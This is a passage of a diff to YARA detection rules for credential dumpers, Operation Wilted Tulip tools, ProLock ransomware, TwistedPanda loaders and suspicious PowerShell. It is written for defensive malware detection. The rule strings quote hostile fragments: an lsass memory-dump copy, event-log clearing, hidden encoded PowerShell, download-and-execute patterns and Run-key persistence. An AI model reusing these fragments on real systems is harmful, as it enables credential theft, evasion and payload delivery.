+		$x3 = "-Arg@{Name=$VarName;VariableValue=$OSiRis;UserName=$env:Username}" ascii wide
+		$x4 = "Device Guard Bypass Command Execution" ascii wide
 
 	condition:
-		all of them
+		filesize < 8MB and 1 of them
 }
-rule SIGNATURE_BASE_Reveal_Memorycredentials : FILE
+rule SIGNATURE_BASE_MAL_Prolock_Malware : FILE
 {
 	meta:
-		description = "Auto-generated rule - file Reveal-MemoryCredentials.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ca06c702-45fe-5ab5-b53e-c3f7b7006570"
-		date = "2015-08-31"
+		description = "Detects Prolock malware in encrypted and decrypted mode"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "269bf0c5-8315-5405-8e44-e2cc5507a36a"
+		date = "2020-05-17"
 		modified = "2023-12-05"
-		reference = "https://github.com/giMini/RWMC/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rwmc_powershell_creddump.yar#L8-L24"
+		reference = "https://raw.githubusercontent.com/fboldewin/YARA-rules/master/Prolock.Malware.yar"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_prolock.yar#L1-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "893c26818c424d0ff549c1fbfa11429f36eecd16ee69330c442c59a82ce6adea"
-		logic_hash = "d740462aacd3b30d0258d018344642683fefd43ef033dd7f5bdde2bdddce4115"
+		logic_hash = "da8a0ec683475019daddd4acdd00d4c36eedacad3deef2be4220b86cbf5f9df0"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a6ded68af5a6e5cc8c1adee029347ec72da3b10a439d98f79f4b15801abd7af0"
+		hash2 = "dfbd62a3d1b239601e17a5533e5cef53036647901f3fb72be76d92063e279178"
 
 	strings:
-		$s1 = "$dumpAProcessPath = \"C:\\Windows\\temp\\msdsc.exe\"" fullword ascii
-		$s2 = "$user = Get-ADUser -Filter {UserPrincipalName -like $loginPlainText -or sAMAccountName -like $loginPlainText}" fullword ascii
-		$s3 = "Copy-Item -Path \"\\\\$computername\\\\c$\\windows\\temp\\lsass.dmp\" -Destination \"$logDirectoryPath\"" fullword ascii
-		$s4 = "if($backupOperatorsFlag -eq \"true\") {$loginPlainText = $loginPlainText + \" = Backup Operators\"}            " fullword ascii
+		$DecryptionRoutine = {01 C2 31 DB B8 ?? ?? ?? ?? 31 04 1A 81 3C 1A}
+		$DecryptedString1 = "support981723721@protonmail.com" nocase ascii
+		$DecryptedString2 = "Your files have been encrypted by ProLock Ransomware" nocase ascii
+		$DecryptedString3 = "msaoyrayohnp32tcgwcanhjouetb5k54aekgnwg7dcvtgtecpumrxpqd.onion" nocase ascii
+		$CryptoCode = {B8 63 51 E1 B7 31 D2 8D BE ?? ?? ?? ?? B9 63 51 E1 B7 81 C1 B9 79 37 9E}
 
 	condition:
-		filesize < 200KB and 1 of them
+		(( uint16( 0 ) == 0x5A4D ) or ( uint16( 0 ) == 0x4D42 ) ) and filesize < 100KB and ( ( $DecryptionRoutine ) or ( 1 of ( $DecryptedString* ) and $CryptoCode ) )
 }
-rule SIGNATURE_BASE_Minidumptest_Msdsc : FILE
+rule SIGNATURE_BASE_APT_CN_Twistedpanda_Loader : FILE
 {
 	meta:
-		description = "Auto-generated rule - file msdsc.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "044ae157-aba2-5935-9afc-8a12853c84bc"
-		date = "2015-08-31"
-		modified = "2023-12-05"
-		reference = "https://github.com/giMini/RWMC/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rwmc_powershell_creddump.yar#L26-L42"
+		description = "Detects loader used by TwistedPanda"
+		author = "Check Point Research"
+		id = "a10f6019-f069-579c-b112-18537a7d8fd8"
+		date = "2022-04-14"
+		modified = "2025-07-01"
+		reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_twisted_panda.yar#L1-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "477034933918c433f521ba63d2df6a27cc40a5833a78497c11fb0994d2fd46ba"
-		logic_hash = "ae8a28df245a8f7a2d62639789c31556b012322fcac09784595fd6f95d6bf195"
-		score = 50
+		logic_hash = "b7f4f31a26b5f968b1d5c82d9165b4d45d75336993b113dda54fd37f628639ee"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5b558c5fcbed8544cb100bd3db3c04a70dca02eec6fedffd5e3dcecb0b04fba0"
+		hash2 = "efa754450f199caae204ca387976e197d95cdc7e83641444c1a5a91b58ba6198"
 
 	strings:
-		$s1 = "MiniDumpTest1.exe" fullword wide
-		$s2 = "MiniDumpWithTokenInformation" fullword ascii
-		$s3 = "MiniDumpTest1" fullword wide
-		$s6 = "Microsoft 2008" fullword ascii
+		$seq1 = { 6A 40 68 00 30 00 00 }
+		$seq2 = { 6A 00 50 6A 14 8D ?? ?? ?? ?? ?? 50 53 FF }
+		$seq3 = { 6A 00 6A 00 6A 03 6A 00 6A 03 68 00 00 00 80 }
+		$decryption = { 8B C? [2-3] F6 D? 1A C? [4-6] 30 0? ?? 4? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 3000KB and all of ( $seq* ) and $decryption
 }
-rule SIGNATURE_BASE_Wiltedtulip_Tools_Back : FILE
+rule SIGNATURE_BASE_APT_CN_Twistedpanda_SPINNER_1 : FILE
 {
 	meta:
-		description = "Detects Chrome password dumper used in Operation Wilted Tulip"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3f57bd66-b269-5f59-ade1-f881b1d7dadd"
-		date = "2017-07-23"
-		modified = "2022-12-21"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L13-L29"
+		description = "Detects the obfuscated variant of SPINNER payload used by TwistedPanda"
+		author = "Check Point Research"
+		id = "0b44013d-0caa-5ea2-ab08-e2a6a5732c03"
+		date = "2022-04-14"
+		modified = "2025-07-01"
+		reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_twisted_panda.yar#L46-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3a23491cbb24177c027695d8f677c4a72ed0404c4c38356eec4b92f2d06be2ee"
-		score = 75
+		logic_hash = "e7abe4b3f4225596131882a9175f9ac2e45ba00557950772a8e4d1eaeab97d05"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b7faeaa6163e05ad33b310a8fdc696ccf1660c425fa2a962c3909eada5f2c265"
+		hash1 = "a9fb7bb40de8508606a318866e0e5ff79b98f314e782f26c7044622939dfde81"
 
 	strings:
-		$x1 = "%s.exe -f \"C:\\Users\\Admin\\Google\\Chrome\\TestProfile\" -o \"c:\\passlist.txt\"" fullword ascii
-		$x2 = "\\ChromePasswordDump\\Release\\FireMaster.pdb" ascii
-		$x3 = "//Dump Chrome Passwords to a Output file \"c:\\passlist.txt\"" fullword ascii
+		$config_init = { C7 ?? ?? ?? 00 00 00 C7 ?? ?? ?? 00 00 00 C6 }
+		$c2_cmd_1 = { 01 00 03 10}
+		$c2_cmd_2 = { 02 00 01 10}
+		$c2_cmd_3 = { 01 00 01 10}
+		$decryption = { 8D 83 [4] 80 B3 [5] 89 F1 6A 01 50 E8 [4] 80 B3 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 3000KB and #config_init > 10 and 2 of ( $c2_cmd_* ) and $decryption
 }
-rule SIGNATURE_BASE_Wiltedtulip_Tools_Clrlg : FILE
+rule SIGNATURE_BASE_APT_CN_Twistedpanda_SPINNER_2 : FILE
 {
 	meta:
-		description = "Detects Windows eventlog cleaner used in Operation Wilted Tulip - file clrlg.bat"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6957c97d-2c2d-50ac-8fd5-2f299fc7b5c8"
-		date = "2017-07-23"
-		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L31-L45"
+		description = "Detects an older variant of SPINNER payload used by TwistedPanda"
+		author = "Check Point Research"
+		id = "bbbf3af1-127f-5d32-967f-bdb94311d1d6"
+		date = "2022-04-14"
+		modified = "2025-07-01"
+		reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_twisted_panda.yar#L82-L118"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "003f711ac6f2308f2bdc638da7c654686e7402db7b3837120168e5a99b774537"
-		score = 75
+		logic_hash = "d1e34903e58fb76671a076acbb9f26e10d511c8f00be90b4901d61b73b90a9a7"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b33fd3420bffa92cadbe90497b3036b5816f2157100bf1d9a3b6c946108148bf"
+		hash1 = "28ecd1127bac08759d018787484b1bd16213809a2cc414514dc1ea87eb4c5ab8"
 
 	strings:
-		$s1 = "('wevtutil.exe el') DO (call :do_clear" fullword ascii
-		$s2 = "wevtutil.exe cl %1" fullword ascii
+		$config_init = { C7 [3] 00 00 00 C7 [3] 00 00 00 C6 }
+		$c2_cmd_1 = { 01 00 03 10 }
+		$c2_cmd_2 = { 02 00 01 10 }
+		$c2_cmd_3 = { 01 00 01 10 }
+		$c2_cmd_4 = { 01 00 00 10 }
+		$c2_cmd_5 = { 02 00 00 10 }
+		$decryption = { 80 B3 [5] 8D BB [4] 8B 56 14 8B C2 8B 4E 10 2B C1 83 F8 01 }
 
 	condition:
-		filesize < 1KB and 1 of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 3000KB and #config_init > 10 and 2 of ( $c2_cmd_* ) and $decryption
 }
-rule SIGNATURE_BASE_Wiltedtulip_Powershell
+rule SIGNATURE_BASE_APT_CN_Twistedpanda_64Bit_Loader : FILE
 {
 	meta:
-		description = "Detects powershell script used in Operation Wilted Tulip"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b6246508-a6ff-5a02-a0de-9cde139f0acc"
-		date = "2017-07-23"
-		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L47-L60"
+		description = "Detects the 64bit Loader DLL used by TwistedPanda"
+		author = "Check Point Research"
+		id = "2172dd33-204b-5a05-ad26-534a0c1d7a17"
+		date = "2022-04-14"
+		modified = "2025-07-01"
+		reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_twisted_panda.yar#L120-L155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "57d28f7b79cc14b8bbc2d7c9b2c16ab0f94a4b160cf7cb1d4641fe1c77e06811"
-		score = 75
+		logic_hash = "644547f9fa6ca3f34ea32e06896f341e0c92f5c57dee3c478aed0cdf87b2f3de"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e5ee1f45cbfdb54b02180e158c3c1f080d89bce6a7d1fe99dd0ff09d47a36787"
+		tags = "FILE"
+		hash1 = "e0d4ef7190ff50e6ad2a2403c87cc37254498e8cc5a3b2b8798983b1b3cdc94f"
 
 	strings:
-		$x1 = "powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+" ascii
+		$path_check = { 48 8D [6] 48 8B ?? 48 81 [5] 72 }
+		$shellcode_read = { 48 8B D0 41 B8 F0 16 00 00 48 8B CF 48 8B D8 FF}
+		$shellcode_allocate = { BA F0 16 00 00 44 8D 4E 40 33 C9 41 B8 00 30 00 00 FF }
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 3000KB and $path_check and $shellcode_allocate and $shellcode_read
 }
-rule SIGNATURE_BASE_Wiltedtulip_Vminst : FILE
+rule SIGNATURE_BASE_APT_CN_Twistedpanda_Droppers : FILE
 {
 	meta:
-		description = "Detects malware used in Operation Wilted Tulip"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5d21e515-eb7b-56ab-acc2-f09065769b2d"
-		date = "2017-07-23"
-		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L62-L88"
+		description = "Detects droppers used by TwistedPanda"
+		author = "Check Point Research"
+		id = "f61c8b97-5870-5837-942f-f1650870960a"
+		date = "2022-04-14"
+		modified = "2025-07-01"
+		reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_twisted_panda.yar#L157-L194"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a4559c2f4de60537827d167453751a92c0030ae6ce095a2d64df777e93d4b87a"
-		score = 75
+		logic_hash = "820b4796511dcf98cdc8017a39cc2c65e44d8d9a20f55803aa1ddd36f649c83a"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "930118fdf1e6fbffff579e65e1810c8d91d4067cbbce798c5401cf05d7b4c911"
+		hash1 = "59dea38da6e515af45d6df68f8959601e2bbf0302e35b7989e741e9aba2f0291"
+		hash2 = "8b04479fdf22892cdfebd6e6fbed180701e036806ed0ddbe79f0b29f73449248"
+		hash3 = "f29a0cda6e56fc0e26efa3b6628c6bcaa0819a3275a10e9da2a8517778152d66"
 
 	strings:
-		$x1 = "\\C++\\Trojan\\Target\\" ascii
-		$s1 = "%s\\system32\\rundll32.exe" fullword wide
-		$s2 = "$C:\\Windows\\temp\\l.tmp" fullword wide
-		$s3 = "%s\\svchost.exe" fullword wide
-		$s4 = "args[10] is %S and command is %S" fullword ascii
-		$s5 = "LOGON USER FAILD " fullword ascii
-		$s6 = "vminst.tmp" fullword wide
-		$s7 = "operator co_await" fullword ascii
-		$s8 = "?ReflectiveLoader@@YGKPAX@Z" fullword ascii
-		$s9 = "%s -k %s" fullword wide
-		$s10 = "ERROR in %S/%d" fullword ascii
+		$switch_control = { 81 FA [4] 75 ?? E8 [4] 48 89 05 [4] E? }
+		$byte_manipulation = { 41 0F [2] 44 [2] 41 [2] 03 41 81 [5] 41 }
+		$stack_strings_1 = { 25 00 70 00 }
+		$stack_strings_2 = { 75 00 62 00 }
+		$stack_strings_3 = { 6C 00 69 00 }
+		$stack_strings_4 = { 63 00 25 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 5 of ( $s* ) )
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 3000KB and #switch_control > 8 and all of ( $stack_strings_* ) and $byte_manipulation
 }
-rule SIGNATURE_BASE_Wiltedtulip_Windows_UM_Task
+rule SIGNATURE_BASE_Worddoc_Powershell_Urldownloadtofile : FILE
 {
 	meta:
-		description = "Detects a Windows scheduled task as used in Operation Wilted Tulip"
+		description = "Detects Word Document with PowerShell URLDownloadToFile"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d827584e-8298-56e4-8466-90950d1f286e"
-		date = "2017-07-23"
-		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L90-L107"
+		id = "f76c5f91-f67c-5754-b771-73383aba4d64"
+		date = "2017-02-23"
+		modified = "2024-04-03"
+		reference = "https://www.arbornetworks.com/blog/asert/additional-insights-shamoon2/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_susp.yar#L10-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cfc2d231b6be798172e5d7ffc525842c7eed6d78a145c401136452c46f21e3b2"
+		logic_hash = "e4ea4e6092011bccfc5132186b910075361f4f77f01ae00c51c486d77a996775"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4c2fc21a4aab7686877ddd35d74a917f6156e48117920d45a3d2f21fb74fedd3"
+		super_rule = 1
+		hash1 = "33ee8a57e142e752a9c8960c4f38b5d3ff82bf17ec060e4114f5b15d22aa902e"
+		hash2 = "388b26e22f75a723ce69ad820b61dd8b75e260d3c61d74ff21d2073c56ea565d"
+		hash3 = "71e584e7e1fb3cf2689f549192fe3a82fd4cd8ee7c42c15d736ebad47b028087"
 
 	strings:
-		$r1 = "<Command>C:\\Windows\\syswow64\\rundll32.exe</Command>" fullword wide
-		$p1 = "<Arguments>\"C:\\Users\\public\\" wide
-		$c1 = "svchost64.swp\",checkUpdate" wide ascii
-		$c2 = "svchost64.swp,checkUpdate" wide ascii
+		$w1 = "Microsoft Forms 2.0 CommandButton" fullword ascii
+		$w2 = "Microsoft Word 97-2003 Document" fullword ascii
+		$p1 = "powershell.exe" fullword ascii
+		$p2 = "URLDownloadToFile" fullword ascii
 
 	condition:
-		($r1 and $p1 ) or 1 of ( $c* )
+		( uint16( 0 ) == 0xcfd0 and 1 of ( $w* ) and all of ( $p* ) )
 }
-rule SIGNATURE_BASE_Wiltedtulip_Windowstask
+rule SIGNATURE_BASE_Suspicious_Powershell_Code_1 : FILE
 {
 	meta:
-		description = "Detects hack tool used in Operation Wilted Tulip - Windows Tasks"
+		description = "Detects suspicious PowerShell code"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ad8193f0-e664-50a8-ab05-38027a2e33cd"
-		date = "2017-07-23"
-		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L109-L128"
+		id = "ec3c3682-d2de-52b7-bb49-b021ddf7f8ac"
+		date = "2017-02-22"
+		modified = "2024-04-03"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_susp.yar#L32-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a2bbcb02f34b2da3d88772d211cc7bfb669384161eec94336cdc2474144b16ae"
-		score = 75
-		quality = 85
-		tags = ""
+		logic_hash = "0a254e0e4f0fdaa5907f5fe0b0c3d5226e2fdac4072349019abc2b2b11cbde30"
+		score = 60
+		quality = 58
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c3cbe88b82cd0ea46868fb4f2e8ed226f3419fc6d4d6b5f7561e70f4cd33822c"
-		hash2 = "340cbbffbb7685133fc318fa20e4620ddf15e56c0e65d4cf1b2d606790d4425d"
-		hash3 = "b6f515b3f713b70b808fc6578232901ffdeadeb419c9c4219fbfba417bba9f01"
-		hash4 = "5046e7c28f5f2781ed7a63b0871f4a2b3065b70d62de7254491339e8fe2fa14a"
-		hash5 = "984c7e1f76c21daf214b3f7e131ceb60c14abf1b0f4066eae563e9c184372a34"
 
 	strings:
-		$x1 = "<Command>C:\\Windows\\svchost.exe</Command>" fullword wide
-		$x2 = "<Arguments>-nop -w hidden -encodedcommand" wide
-		$x3 = "-encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA"
+		$s1 = /$[a-z]=new-object net.webclient/ ascii
+		$s2 = /$[a-z].DownloadFile\("http:/ ascii
+		$s3 = /IEX $[a-zA-Z]{1,8}.downloadstring\(["']http/ ascii nocase
+		$s4 = "powershell.exe -w hidden -ep bypass -Enc" ascii
+		$s5 = "-w hidden -noni -nop -c \"iex(New-Object" ascii
+		$s6 = "powershell.exe reg add HKCU\\software\\microsoft\\windows\\currentversion\\run" nocase
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Wiltedtulip_Tdtess : FILE
+rule SIGNATURE_BASE_Suspicious_Powershell_Webdownload_1 : HIGHVOL FILE
 {
 	meta:
-		description = "Detects malicious service used in Operation Wilted Tulip"
+		description = "Detects suspicious PowerShell code that downloads from web sites"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0ecb391b-a4f9-5362-bb65-73801ae497de"
-		date = "2017-07-23"
-		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L130-L147"
+		id = "a763fb82-c840-531b-b631-f282bf035020"
+		date = "2017-02-22"
+		modified = "2024-04-03"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_susp.yar#L52-L91"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ffd10e06b3a8f3054747443b863070e8726589fc795f816832dbf73c0c34e080"
-		score = 75
+		logic_hash = "56ad9c71c34956e94325452d829627a30b1499552725232a07100f05a050ef1b"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = "HIGHVOL, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3fd28b9d1f26bd0cee16a167184c9f4a22fd829454fd89349f2962548f70dc34"
+		nodeepdive = 1
 
 	strings:
-		$x1 = "d2lubG9naW4k" fullword wide
-		$x2 = "C:\\Users\\admin\\Documents\\visual studio 2015\\Projects\\Export\\TDTESS_ShortOne\\WinService Template\\" ascii
-		$s1 = "\\WinService Template\\obj\\x64\\x64\\winlogin" ascii
-		$s2 = "winlogin.exe" fullword wide
+		$s1 = "System.Net.WebClient).DownloadString(\"http" ascii nocase
+		$s2 = "System.Net.WebClient).DownloadString('http" ascii nocase
+		$s3 = "system.net.webclient).downloadfile('http" ascii nocase
+		$s4 = "system.net.webclient).downloadfile(\"http" ascii nocase
+		$s5 = "GetString([Convert]::FromBase64String(" ascii nocase
+		$fp1 = "NuGet.exe" ascii fullword
+		$fp2 = "chocolatey.org" ascii
+		$fp3 = " GET /"
+		$fp4 = " POST /"
+		$fp5 = ".DownloadFile('https://aka.ms/installazurecliwindows', 'AzureCLI.msi')" ascii
+		$fp6 = " 404 "
+		$fp7 = "# RemoteSSHConfigurationScript" ascii
+		$fp8 = "<helpItems" ascii fullword
+		$fp9 = "DownloadFile(\"https://codecov.io/bash" ascii
+		$fp10 = "DownloadFile('https://get.golang.org/installer.exe" ascii
+		$fpg1 = "All Rights"
+		$fpg2 = "<html"
+		$fpg3 = "<HTML"
+		$fpg4 = "Copyright"
+		$fpg5 = "License"
+		$fpg6 = "<?xml"
+		$fpg7 = "Help" fullword
+		$fpg8 = "COPYRIGHT" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 2 of them ) )
+		1 of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Wiltedtulip_Silverlightmsi : FILE
+rule SIGNATURE_BASE_Powershell_In_Word_Doc : FILE
 {
 	meta:
-		description = "Detects powershell tool call Get_AD_Users_Logon_History used in Operation Wilted Tulip"
+		description = "Detects a powershell and bypass keyword in a Word document"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6430d464-b9c7-5f19-b89d-3c70f99af688"
-		date = "2017-07-23"
-		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L149-L165"
+		id = "c9d073ff-25c6-5751-92bf-e22ae7cfd5f5"
+		date = "2017-06-27"
+		modified = "2024-04-03"
+		reference = "Internal Research - ME"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_susp.yar#L104-L119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "716db8f8e7d71c7f3deaeb9ac8e141c9bf374e5dae992e8e2623070c81089953"
-		score = 75
-		quality = 85
+		logic_hash = "6a9b295f1c430c285aedc5e6df268ea2023c8bdaccd04cf8a5d021419cd6bd64"
+		score = 50
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c75906dbc3078ff81092f6a799c31afc79b1dece29db696b2ecf27951a86a1b2"
+		hash1 = "4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905"
 
 	strings:
-		$x1 = ".\\Get_AD_Users_Logon_History.ps1 -MaxEvent" fullword ascii
-		$x2 = "if ((Resolve-dnsname $_.\"IP Address\" -Type PTR -TcpOnly -DnsOnly -ErrorAction \"SilentlyContinue\").Type -eq \"PTR\")" fullword ascii
-		$x3 = "$Client_Name = (Resolve-dnsname $_.\"IP Address\" -Type PTR -TcpOnly -DnsOnly).NameHost  " fullword ascii
-		$x4 = "########## Find the Computer account in AD and if not found, throw an exception ###########" fullword ascii
+		$s1 = "POwErSHELl.ExE" fullword ascii nocase
+		$s2 = "BYPASS" fullword ascii nocase
 
 	condition:
-		( filesize < 20KB and 1 of them )
+		( uint16( 0 ) == 0xcfd0 and filesize < 1000KB and all of them )
 }
-
-rule SIGNATURE_BASE_Wiltedtulip_Matryoshka_Injector : FILE
+rule SIGNATURE_BASE_Susp_Powershell_Sep17_1 : FILE
 {
 	meta:
-		description = "Detects hack tool used in Operation Wilted Tulip"
+		description = "Detects suspicious PowerShell script in combo with VBS or JS "
 		author = "Florian Roth (Nextron Systems)"
-		id = "e4cf2a31-33c8-5db1-84ca-f63b65a0a0a3"
-		date = "2017-07-23"
-		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L167-L189"
+		id = "6d4b9113-173f-5c12-b440-7f1cef9e6ebb"
+		date = "2017-09-30"
+		modified = "2024-04-03"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_susp.yar#L131-L148"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e02d26882c85b77bd97629fce20bd027e1f5f7e28ae0c43c9ea7a4b1e5d02cd1"
-		score = 75
+		logic_hash = "6c8a1e72b2c4685a5a5749d86901b123976092aee373412bf04c62aa32145be8"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c41e97b3b22a3f0264f10af2e71e3db44e53c6633d0d690ac4d2f8f5005708ed"
-		hash2 = "b93b5d6716a4f8eee450d9f374d0294d1800784bc99c6934246570e4baffe509"
+		hash1 = "8e28521749165d2d48bfa1eac685c985ac15fc9ca5df177d4efadf9089395c56"
 
 	strings:
-		$s1 = "Injector.dll" fullword ascii
-		$s2 = "ReflectiveLoader" fullword ascii
+		$x1 = "Process.Create(\"powershell.exe -nop -w hidden" fullword ascii nocase
